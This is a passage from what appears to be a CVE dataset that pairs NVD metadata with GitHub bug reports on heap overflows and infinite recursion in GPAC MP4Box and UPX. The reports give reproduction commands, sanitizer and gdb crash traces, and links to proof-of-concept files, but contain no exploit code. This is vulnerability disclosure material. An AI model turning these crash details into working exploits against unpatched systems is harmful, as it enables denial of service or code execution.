[avc-h264] invalid SPS: log2_max_frame_num_minus4 shall be less than 12, but is 16962257
[AVC|H264] Error parsing NAL unit type 7
[AVC|H264] Error parsing NAL unit type 8
[AVC|H264] Error parsing Picture Param Set
[avc-h264] SEI user message type 16 size error (45 but 7 remain), keeping full SEI untouched
[avc-h264] invalid SPS: log2_max_frame_num_minus4 shall be less than 12, but is 32527
[AVC|H264] Error parsing NAL unit type 7
[AVC|H264] Error parsing NAL unit type 8
[AVC|H264] Error parsing Picture Param Set
[AVC|H264] Error parsing NAL unit type 8
[AVC|H264] Error parsing Picture Param Set
[AVC|H264] Error parsing NAL unit type 8
[AVC|H264] Error parsing Picture Param Set
[avc-h264] invalid SPS: log2_max_frame_num_minus4 shall be less than 12, but is 16964897
[AVC|H264] Error parsing NAL unit type 7
[avc-h264] Unknown aspect_ratio_idc: your video may have a wrong aspect ratio. Contact the GPAC team!
[avc-h264] invalid SPS: log2_max_frame_num_minus4 shall be less than 12, but is 63
[AVC|H264] Error parsing NAL unit type 7
[avc-h264] Unknown aspect_ratio_idc: your video may have a wrong aspect ratio. Contact the GPAC team!
realloc(): invalid next size
Aborted
```
`realloc(): invalid next size` indicates that there was a bof on heap indeed, overwriting the size field of a heap chunk.
# POC
[poc_bof14.zip](https://github.com/gpac/gpac/files/10253586/poc_bof14.zip)
# Impact
Potentially causing DoS and RCE
# Credit
Xdchase
| heap-buffer-overflow media_tools/av_parsers.c:4988 in gf_media_nalu_add_emulation_bytes | https://api.github.com/repos/gpac/gpac/issues/2358/comments | 0 | 2022-12-18T10:23:38Z | 2022-12-19T11:26:12Z | https://github.com/gpac/gpac/issues/2358 | 1,501,850,698 | 2,358 |
CVE-2022-47662 | 2023-01-05T16:15:11.400 | GPAC MP4Box 2.1-DEV-rev649-ga8f438d20 has a segment fault (/stack overflow) due to infinite recursion in Media_GetSample isomedia/media.c:662 | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2359"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://www.debian.org/security/2023/dsa-5411"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B4D3D58A-C3C9-4441-A84A-FB91FD19985C",
"versionEndExcluding": "2.2.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/gpac/gpac/issues/2359 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | - [X] I looked for a similar issue and couldn't find any.
- [X] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
- [X] I give enough information for contributors to reproduce my issue (meaningful title, github labels,
# Description
segment fault (/stack overflow) due to infinite recursion in Media_GetSample isomedia/media.c:662
# Version info
latest version atm
```
MP4Box - GPAC version 2.1-DEV-rev649-ga8f438d20-master
(c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
Please cite our work in your research:
GPAC Filters: https://doi.org/10.1145/3339825.3394929
GPAC: https://doi.org/10.1145/1291233.1291452
GPAC Configuration: --enable-sanitizer
Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D
```
# Reproduce
compile and run
```
./configure --enable-sanitizer
make
./MP4Box import -cat poc_segfault2.mp4
```
Crash reported by sanitizer
```
[HEVC] Error parsing NAL unit type 63
Track Importing L-HEVC - Width 1 Height 6 FPS 25000/1000
[HEVC] NAL Unit type 26 not handled - adding
[HEVC] xPS changed but could not flush frames before signaling state change !
[HEVC] Error parsing NAL unit type 33
[HEVC] Error parsing NAL unit type 32
[HEVC] Invalid log2_max_pic_order_cnt_lsb_minus4 80, max shall be 12
[HEVC] Error parsing NAL unit type 33
[HEVC] Error parsing Sequence Param Set
[HEVC] Error parsing NAL unit type 34
[HEVC] Error parsing NAL unit type 0
[HEVC] Error parsing NAL unit type 32
[HEVC] Error parsing NAL unit type 32
HEVC Import results: 7 samples (39 NALUs) - Slices: 0 I 0 P 1 B - 0 SEI - 0 IDR - 0 CRA
HEVC L-HEVC Import results: Slices: 3 I 0 P 2 B
HEVC Stream uses forward prediction - stream CTS offset: 6 frames
HEVC Max NALU size is 106 - stream could be optimized by setting nal_length=1
Appending file /home/sumuchuan/Desktop/gpac_fuzz/cat_gpac/bin/gcc/out/default/crashes/160.mp4
No suitable destination track found - creating new one (type vide)
AddressSanitizer:DEADLYSIGNAL | (57/100)
=================================================================
==738673==ERROR: AddressSanitizer: stack-overflow on address 0x7ffdae782bc0 (pc 0x7f415d384491 bp 0x7ffdae783400 sp 0x7ffdae782bc0 T0)
#0 0x7f415d384491 in __sanitizer::StackTrace::StackTrace(unsigned long const*, unsigned int) ../../../../src/libsanitizer/sanitizer_common/sanitizer_stacktrace.h:52
#1 0x7f415d384491 in __sanitizer::BufferedStackTrace::BufferedStackTrace() ../../../../src/libsanitizer/sanitizer_common/sanitizer_stacktrace.h:105
#2 0x7f415d384491 in __interceptor_free ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:127
#3 0x7f415787f858 in __GI__IO_free_backup_area libio/genops.c:190
#4 0x7f415787cae3 in _IO_new_file_seekoff libio/fileops.c:975
#5 0x7f415787ad52 in __fseeko libio/fseeko.c:40
#6 0x7f4159a1536a in BS_SeekIntern utils/bitstream.c:1338
#7 0x7f4159a1536a in gf_bs_seek utils/bitstream.c:1373
#8 0x7f4159fbbfc9 in gf_isom_fdm_get_data isomedia/data_map.c:501
#9 0x7f4159fbbfc9 in gf_isom_datamap_get_data isomedia/data_map.c:279
#10 0x7f415a0a1f40 in Media_GetSample isomedia/media.c:641
#11 0x7f4159ffc579 in gf_isom_get_sample_ex isomedia/isom_read.c:1916
#12 0x7f4159ec91ca in gf_isom_nalu_sample_rewrite isomedia/avc_ext.c:454
#13 0x7f415a0a305a in Media_GetSample isomedia/media.c:662
#14 0x7f4159ffc579 in gf_isom_get_sample_ex isomedia/isom_read.c:1916
#15 0x7f4159ec91ca in gf_isom_nalu_sample_rewrite isomedia/avc_ext.c:454
#16 0x7f415a0a305a in Media_GetSample isomedia/media.c:662
#17 0x7f4159ffc579 in gf_isom_get_sample_ex isomedia/isom_read.c:1916
#18 0x7f4159ec91ca in gf_isom_nalu_sample_rewrite isomedia/avc_ext.c:454
#19 0x7f415a0a305a in Media_GetSample isomedia/media.c:662
#20 0x7f4159ffc579 in gf_isom_get_sample_ex isomedia/isom_read.c:1916
#21 0x7f4159ec91ca in gf_isom_nalu_sample_rewrite isomedia/avc_ext.c:454
#22 0x7f415a0a305a in Media_GetSample isomedia/media.c:662
#23 0x7f4159ffc579 in gf_isom_get_sample_ex isomedia/isom_read.c:1916
#24 0x7f4159ec91ca in gf_isom_nalu_sample_rewrite isomedia/avc_ext.c:454
...
```
looks like an infinite recursion
```
Media_GetSample isomedia/media.c:662
-> gf_isom_nalu_sample_rewrite isomedia/avc_ext.c:454
-> gf_isom_get_sample_ex isomedia/isom_read.c:1916
-> Media_GetSample isomedia/media.c:662
```
if compile without ASAN and run the same poc
```
./configure --static-bin
make
./MP4Box import -cat poc_segfault2.mp4
```
there will be a segment fault
```
[HEVC] Error parsing NAL unit type 63
Track Importing L-HEVC - Width 1 Height 6 FPS 25000/1000
[HEVC] NAL Unit type 26 not handled - adding
[HEVC] xPS changed but could not flush frames before signaling state change !
[HEVC] Error parsing NAL unit type 33
[HEVC] Error parsing NAL unit type 32
[HEVC] Invalid log2_max_pic_order_cnt_lsb_minus4 80, max shall be 12
[HEVC] Error parsing NAL unit type 33
[HEVC] Error parsing Sequence Param Set
[HEVC] Error parsing NAL unit type 34
[HEVC] Error parsing NAL unit type 0
[HEVC] Error parsing NAL unit type 32
[HEVC] Error parsing NAL unit type 32
HEVC Import results: 7 samples (39 NALUs) - Slices: 0 I 0 P 1 B - 0 SEI - 0 IDR - 0 CRA
HEVC L-HEVC Import results: Slices: 3 I 0 P 2 B
HEVC Stream uses forward prediction - stream CTS offset: 6 frames
HEVC Max NALU size is 106 - stream could be optimized by setting nal_length=1
Appending file /home/sumuchuan/Desktop/gpac_fuzz/cat_gpac/bin/gcc/out/default/crashes/160.mp4
No suitable destination track found - creating new one (type vide)
Segmentation fault===== | (57/100)
```
Because it ran out of stack space, making rsp and rbp point to an unmapped memory, causing seg fault. backtrace atm
```
pwndbg> bt
...
#16487 0x000000000054d599 in gf_isom_get_sample_ex ()
#16488 0x0000000000521d6d in gf_isom_nalu_sample_rewrite ()
#16489 0x0000000000570e13 in Media_GetSample ()
#16490 0x000000000054d599 in gf_isom_get_sample_ex ()
#16491 0x0000000000521d6d in gf_isom_nalu_sample_rewrite ()
#16492 0x0000000000570e13 in Media_GetSample ()
#16493 0x000000000054d599 in gf_isom_get_sample_ex ()
#16494 0x0000000000521d6d in gf_isom_nalu_sample_rewrite ()
#16495 0x0000000000570e13 in Media_GetSample ()
...
```
# POC
[poc-segfault2.zip](https://github.com/gpac/gpac/files/10253557/poc-segfault2.zip)
# Impact
Potentially causing DoS
# Credit
Xdchase
| Infinite recursion in Media_GetSample isomedia/media.c:662 | https://api.github.com/repos/gpac/gpac/issues/2359/comments | 0 | 2022-12-18T10:23:42Z | 2022-12-19T11:26:12Z | https://github.com/gpac/gpac/issues/2359 | 1,501,850,761 | 2,359 |
CVE-2022-47663 | 2023-01-05T16:15:11.623 | GPAC MP4box 2.1-DEV-rev649-ga8f438d20 is vulnerable to buffer overflow in h263dmx_process filters/reframe_h263.c:609 | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2360"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://www.debian.org/security/2023/dsa-5411"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B4D3D58A-C3C9-4441-A84A-FB91FD19985C",
"versionEndExcluding": "2.2.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/gpac/gpac/issues/2360 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | - [X] I looked for a similar issue and couldn't find any.
- [X] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
- [X] I give enough information for contributors to reproduce my issue (meaningful title, github labels,
# Description
buffer overflow in h263dmx_process filters/reframe_h263.c:609
# Version info
latest version atm
```
MP4Box - GPAC version 2.1-DEV-rev649-ga8f438d20-master
(c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
Please cite our work in your research:
GPAC Filters: https://doi.org/10.1145/3339825.3394929
GPAC: https://doi.org/10.1145/1291233.1291452
GPAC Configuration: --enable-sanitizer
Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D
```
# Reproduce
compile and run
```
./configure --enable-sanitizer
make
./MP4Box import -cat poc_bof13.mp4
```
Crash reported by sanitizer
```
[H263Dmx] garbage before first frame!
Track Importing H263 - Width 704 Height 576 FPS 15000/1000
=================================================================
==735609==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60e000000620 at pc 0x7ff71222b397 bp 0x7ffeaf3c2280 sp 0x7ffeaf3c1a28
READ of size 4294967295 at 0x60e000000620 thread T0
#0 0x7ff71222b396 in __interceptor_memcpy ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:827
#1 0x7ff70fbae101 in memcpy /usr/include/x86_64-linux-gnu/bits/string_fortified.h:29
#2 0x7ff70fbae101 in h263dmx_process filters/reframe_h263.c:609
#3 0x7ff70f7a6f1d in gf_filter_process_task filter_core/filter.c:2815
#4 0x7ff70f7665a3 in gf_fs_thread_proc filter_core/filter_session.c:1859
#5 0x7ff70f772ece in gf_fs_run filter_core/filter_session.c:2120
#6 0x7ff70f1b59c1 in gf_media_import media_tools/media_import.c:1551
#7 0x5617e36bfb4c in import_file /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/fileimport.c:1498
#8 0x5617e36ca5d7 in cat_isomedia_file /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/fileimport.c:2536
#9 0x5617e3674130 in do_add_cat /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:4562
#10 0x5617e3674130 in mp4box_main /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:6124
#11 0x7ff70c73cd8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
#12 0x7ff70c73ce3f in __libc_start_main_impl ../csu/libc-start.c:392
#13 0x5617e3650cb4 in _start (/home/sumuchuan/Desktop/gpac_fuzz/gpac/bin/gcc/MP4Box+0xabcb4)
0x60e000000620 is located 0 bytes to the right of 160-byte region [0x60e000000580,0x60e000000620)
allocated by thread T0 here:
#0 0x7ff7122a5867 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
#1 0x7ff70f7b4528 in gf_filter_parse_args filter_core/filter.c:2033
#2 0x7ff70f7b5234 in gf_filter_new_finalize filter_core/filter.c:510
#3 0x7ff70f7b65d7 in gf_filter_new filter_core/filter.c:439
#4 0x7ff70f7021c7 in gf_filter_pid_resolve_link_internal filter_core/filter_pid.c:3611
#5 0x7ff70f7258b2 in gf_filter_pid_resolve_link_check_loaded filter_core/filter_pid.c:3711
#6 0x7ff70f7258b2 in gf_filter_pid_init_task filter_core/filter_pid.c:4883
#7 0x7ff70f7665a3 in gf_fs_thread_proc filter_core/filter_session.c:1859
#8 0x7ff70f772ece in gf_fs_run filter_core/filter_session.c:2120
#9 0x7ff70f1b59c1 in gf_media_import media_tools/media_import.c:1551
#10 0x5617e36bfb4c in import_file /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/fileimport.c:1498
#11 0x5617e36ca5d7 in cat_isomedia_file /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/fileimport.c:2536
#12 0x5617e3674130 in do_add_cat /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:4562
#13 0x5617e3674130 in mp4box_main /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:6124
#14 0x7ff70c73cd8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:827 in __interceptor_memcpy
Shadow bytes around the buggy address:
0x0c1c7fff8070: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x0c1c7fff8080: 00 00 00 00 00 00 00 00 00 00 00 fa fa fa fa fa
0x0c1c7fff8090: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
0x0c1c7fff80a0: 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa
0x0c1c7fff80b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c1c7fff80c0: 00 00 00 00[fa]fa fa fa fa fa fa fa 00 00 00 00
0x0c1c7fff80d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c1c7fff80e0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x0c1c7fff80f0: 00 00 00 00 00 00 00 00 00 00 00 fa fa fa fa fa
0x0c1c7fff8100: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
0x0c1c7fff8110: 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==735609==ABORTING
```
Looks like the oob read happens in filters/reframe_h263.c
```
READ of size 4294967295 at 0x60e000000620 thread T0
#0 0x7ff71222b396 in __interceptor_memcpy
../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:827
#1 0x7ff70fbae101 in memcpy /usr/include/x86_64-linux-gnu/bits/string_fortified.h:29
#2 0x7ff70fbae101 in h263dmx_process filters/reframe_h263.c:609
```
if compile without ASAN and run the same poc
```
./configure --static-bin
make
./MP4Box import -cat poc_bof13.mp4
```
there will be segment fault
```
[H263Dmx] garbage before first frame!
Track Importing H263 - Width 704 Height 576 FPS 15000/1000
Segmentation fault= | (50/100)
```
backtrace atm
```
pwndbg> bt
#0 0x0000000000afc1cc in __memmove_avx_unaligned_erms ()
#1 0x00000000007f0dbf in h263dmx_process ()
#2 0x00000000006d9c90 in gf_filter_process_task ()
#3 0x00000000006c5dbc in gf_fs_thread_proc ()
#4 0x00000000006cb3bb in gf_fs_run ()
#5 0x00000000006008ed in gf_media_import ()
#6 0x00000000004313d1 in import_file ()
#7 0x00000000004375f1 in cat_isomedia_file ()
#8 0x0000000000411e78 in mp4box_main ()
#9 0x0000000000a8c47a in __libc_start_call_main ()
#10 0x0000000000a8dcd7 in __libc_start_main_impl ()
#11 0x0000000000402c55 in _start ()
```
# POC
[poc_bof13.zip](https://github.com/gpac/gpac/files/10253538/poc_bof13.zip)
# Impact
Potentially causing DoS and RCE
# Credit
Xdchase
| buffer overflow in h263dmx_process filters/reframe_h263.c:609 | https://api.github.com/repos/gpac/gpac/issues/2360/comments | 0 | 2022-12-18T10:23:45Z | 2022-12-19T11:26:13Z | https://github.com/gpac/gpac/issues/2360 | 1,501,850,806 | 2,360 |
CVE-2023-23456 | 2023-01-12T19:15:24.693 | A heap-based buffer overflow issue was discovered in UPX in PackTmt::pack() in p_tmt.cpp file. The flow allows an attacker to cause a denial of service (abort) via a crafted file. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.4,
"source": "[email protected]",
"type": "Secondary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2160381"
},
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/upx/upx/commit/510505a85cbe45e51fbd470f1aa8b02157c429d4"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/upx/upx/issues/632"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EL3BVKIGG3SH6I3KPOYQAWCBD4UMPOPI/"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TGEP3FBNRZXGLIA2B2ICMB32JVMPREFZ/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:upx_project:upx:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CB529776-278E-419A-B8E1-F7A101A77E24",
"versionEndExcluding": "2022-11-24",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:36:*:*:*:*:*:*:*",
"matchCriteriaId": "5C675112-476C-4D7C-BCB9-A2FB2D0BC9FD",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:37:*:*:*:*:*:*:*",
"matchCriteriaId": "E30D0E6F-4AE8-4284-8716-991DFA48CC5D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/upx/upx/issues/632 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"upx",
"upx"
] | <!---
IF YOU REMOVE THIS TEMPLATE WE WILL CLOSE YOUR ISSUE WITHOUT RESPONSE.
Just read it and fill in the details we're asking, it saves so much of our time. Thanks!
-->
## What's the problem (or question)?
<!--- If describing a bug, tell us what happens instead of the expected behavior -->
<!--- If suggesting a change/improvement, explain the difference from current behavior -->
MemBuffer is attempted to be allocated with 0 bytes, failing an assertion in mem.cpp.
ASAN
```
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2022
UPX git-fdec47+ Markus Oberhumer, Laszlo Molnar & John Reiser Nov 16th 2022
File size Ratio Format Name
-------------------- ------ ----------- -----------
=================================================================
==11363==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000ee15 at pc 0x00000051ca96 bp 0x7fffffffc800 sp 0x7fffffffc7f0
WRITE of size 4 at 0x60200000ee15 thread T0
#0 0x51ca95 in set_ne32 /home/chen/upx/src/bele.h:66
#1 0x51ca95 in set_le32(void*, unsigned int) /home/chen/upx/src/bele.h:143
#2 0x51ca95 in PackTmt::pack(OutputFile*) /home/chen/upx/src/p_tmt.cpp:244
#3 0x569704 in Packer::doPack(OutputFile*) /home/chen/upx/src/packer.cpp:96
#4 0x61ca72 in do_one_file(char const*, char*) /home/chen/upx/src/work.cpp:157
#5 0x61cf89 in do_files(int, int, char**) /home/chen/upx/src/work.cpp:271
#6 0x45fe9f in upx_main(int, char**) /home/chen/upx/src/main.cpp:1266
#7 0x407223 in main /home/chen/upx/src/main.cpp:1324
#8 0x7ffff621f83f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f)
#9 0x409ef8 in _start (/home/chen/ifcut/upx/upx-asan+0x409ef8)
0x60200000ee15 is located 0 bytes to the right of 5-byte region [0x60200000ee10,0x60200000ee15)
allocated by thread T0 here:
#0 0x7ffff6f02602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
#1 0x5f3123 in MemBuffer::alloc(unsigned long long) /home/chen/upx/src/util/membuffer.cpp:181
#2 0x51b6d2 in PackTmt::pack(OutputFile*) /home/chen/upx/src/p_tmt.cpp:219
#3 0x569704 in Packer::doPack(OutputFile*) /home/chen/upx/src/packer.cpp:96
#4 0x61ca72 in do_one_file(char const*, char*) /home/chen/upx/src/work.cpp:157
#5 0x61cf89 in do_files(int, int, char**) /home/chen/upx/src/work.cpp:271
#6 0x45fe9f in upx_main(int, char**) /home/chen/upx/src/main.cpp:1266
#7 0x407223 in main /home/chen/upx/src/main.cpp:1324
#8 0x7ffff621f83f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f)
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/chen/upx/src/bele.h:66 set_ne32
Shadow bytes around the buggy address:
0x0c047fff9d70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9d80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9d90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c047fff9dc0: fa fa[05]fa fa fa fd fd fa fa fd fd fa fa fd fd
0x0c047fff9dd0: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
0x0c047fff9de0: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
0x0c047fff9df0: fa fa fd fd fa fa fd fd fa fa fd fa fa fa fd fa
0x0c047fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
==11363==ABORTING
```
gdb
```
(gdb) BT
#0 0x00007ffff71a1438 in __GI_raise (sig=sig@entry=6)
at ../sysdeps/unix/sysv/linux/raise.c:54
#1 0x00007ffff71a303a in __GI_abort () at abort.c:89
#2 0x00007ffff7ae484d in __gnu_cxx::__verbose_terminate_handler() ()
from /usr/lib/x86_64-linux-gnu/libstdc++.so.6
#3 0x00007ffff7ae26b6 in ?? () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6
#4 0x00007ffff7ae16a9 in ?? () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6
#5 0x00007ffff7ae2005 in __gxx_personality_v0 ()
from /usr/lib/x86_64-linux-gnu/libstdc++.so.6
#6 0x00007ffff7545f83 in ?? () from /lib/x86_64-linux-gnu/libgcc_s.so.1
#7 0x00007ffff75462eb in _Unwind_RaiseException () from /lib/x86_64-linux-gnu/libgcc_s.so.1
#8 0x00007ffff7ae290c in __cxa_throw () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6
#9 0x000000000041574a in throwInternalError(char const*) ()
#10 0x00000000004b279d in MemBuffer::checkState() const ()
#11 0x00000000004b2a0f in MemBuffer::dealloc() ()
#12 0x000000000045f431 in PackTmt::pack(OutputFile*) ()
#13 0x000000000047d8c4 in Packer::doPack(OutputFile*) ()
#14 0x00000000004d0245 in do_one_file(char const*, char*) ()
#15 0x00000000004d048f in do_files(int, int, char**) ()
#16 0x0000000000422747 in upx_main(int, char**) ()
#17 0x0000000000405602 in main ()
```
## What should have happened?
<!--- If you're describing a bug, tell us what should happen -->
<!--- If you're suggesting a change/improvement, tell us how it should work -->
No failed assertions.
## Do you have an idea for a solution?
<!--- Not obligatory, but suggest a fix/reason for the bug, -->
<!--- or ideas how to implement the addition or change -->
## How can we reproduce the issue?
<!--- Provide unambiguous set of steps to reproduce this bug. Include code to reproduce, if relevant -->
1. Build UPX 4.0.1 (the latest version)
2. Run `./upx ./POC1`
zipped poc:
[POC1.zip](https://github.com/upx/upx/files/10081325/POC1.zip)
```
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2022
UPX git-fdec47+ Markus Oberhumer, Laszlo Molnar & John Reiser Nov 16th 2022
File size Ratio Format Name
-------------------- ------ ----------- -----------
terminate called after throwing an instance of 'InternalError'
what(): std::exception
Aborted
```
## Please tell us details about your environment.
<!--- Include as many relevant details about the environment you experienced the bug in -->
* UPX version used (`upx --version`):
```
./upx --version
upx v4.0.1-dirty
UCL data compression library 1.03
